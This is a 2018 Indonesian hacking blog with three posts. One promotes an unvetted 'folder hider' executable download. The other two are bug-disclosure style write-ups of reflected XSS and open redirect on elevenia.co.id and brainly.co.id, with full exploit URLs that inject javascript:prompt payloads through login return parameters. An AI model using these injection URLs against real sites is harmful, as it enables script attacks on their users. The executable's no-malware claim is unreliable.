Wednesday, August 29, 2018

Cara Menyembunyikan File/Folder Agar tidak Bisa dilihat orang ( 1ntr0ver7 Tool )

File/Folder Hider By zerboa - Yooo was ap gaes balik lagi sama gw . Pada artikel ini saya mau membagikan artikel yang very very penting bagi kalian kalian penyimpan video bokep atau hentai :""V. Ya tentu saja Folder Hider by ./z3rb0a, Hanya dengan 1 kali download dan 1 kali klik bisa digunakan untuk kesejahteraan bersama. tunggu apa lagi ?? Gass kan lah download pak.

Ini Single File Executable (.exe), yang pasti no firus or logger or RAT ea, w buat dengan tujuan baik tanpa pencitraan sedikitpun.


Screenshot Penampakan :



Link Download :

| MIRRORCREATOR| > | CLICKME|
Note : Kalo Lo Merasa curiga sama apa yang gw share, gk ush didownload dari pada lo pada koar koar gk jelas :)


Thx yang udah berkunjung, jangan lupa di cl1ck Ikl4nnya ea :""v. Dan Stay Tune aja di Page introvert kalo ada update pasti w share ea, Sh000tzzzzz
Read more

Saturday, August 11, 2018

Reflected XSS on elevenia.co.id


Reflected XSS on elevenia.co.id - Halo Guys, Balik lagi bersama saya :D. Pada artikel kali ini saya cuma mau share aja bahwa saya nemu xss di elevenia.co.id , yakni situs jual beli online di indonesia yang cukup banyak diketahui orang orang.

Jadi ceritanya w abis nonton film back to the future, nah terus ada iklan elevenia tuh. Karena w penasaran akhirnya w telusuri telusuri, dan nemu deh :''"V.


PoC


  1. Buka :
https://www.elevenia.co.id/login.do?isSSL=Y&returnURL=javascript:prompt(%27XSS BY ./z3rb0a%27);
  1. Kalau Belom Login Ya Login dulu Baru buka web itu.
  2. Bingo, alertnya muncul deh :D
Oke sekian Untuk Kali ini, Jangan lupa untuk di share keteman teman, dan jangan lupa juga Cl1ck 1kl4nnya ea :''V
Read more

Wednesday, August 8, 2018

[ brainly.co.id / all brainly domain ] Open Redirect and XSS(Reflected)



Bug Report - Halo Sobat sekalian, sebelumnya saya sangat berterimakasih ya bangsat, sama lo semua yang udah ngunjungi blog saya. jangan lupa CL1CK 1KL4N nya ea kampang biar w bisa makan + bayar wifi. 

 Jadi pada artikel kali ini saya akan berbagi pengalaman saya setelah menemukan Open Redirect to XSS di website Brainly.co.id

Brainly Merupakan Startup pendidikan yang bisa digunakan masyarakat indonesia sebagai forum tanya jawab soal dari sekolah.

Berkat brainly juga PR w jadi lebih mudah dan cepat dikerjakan xD
Proof Of Concept :

1. Kunjungi : Brainly.co.id
2. Lalu Klik Login 
3. Maka akan dapat link seperti ini :

https://brainly.co.id/login?entry=2&return=%2F

4. nah di parameter return itu bisa di ganti dengan payload xss atau website lain gans.

Payload xss saya

javascript:prompt(document.domain);
5. Nah kalo saya tambahkan ke url itu maka akan seperti ini

https://brainly.co.id/login?entry=2&return=javascript:prompt(document.domain);

6. Nah Lalu buka dah url itu

7. Setelah login kalian akan mendapatkan hal magic gan xD



Oke Gan itu aja yang bisa saya ceritakan, pokoknya setelah login ada xss nya dah.... unch dah pokoke.

Oke Gans Makasih Buat yang udah berkunjung, dot porget tu lek end sabscreb ea :""v

Note : Ini Bug udah gw Report 9 Agustus 2018 jam 2 siang, Gak dibales apa apa gan. Komenan gw di Feenpeg cuma di like doank, email pun gk dibales bhhhh. 
Read more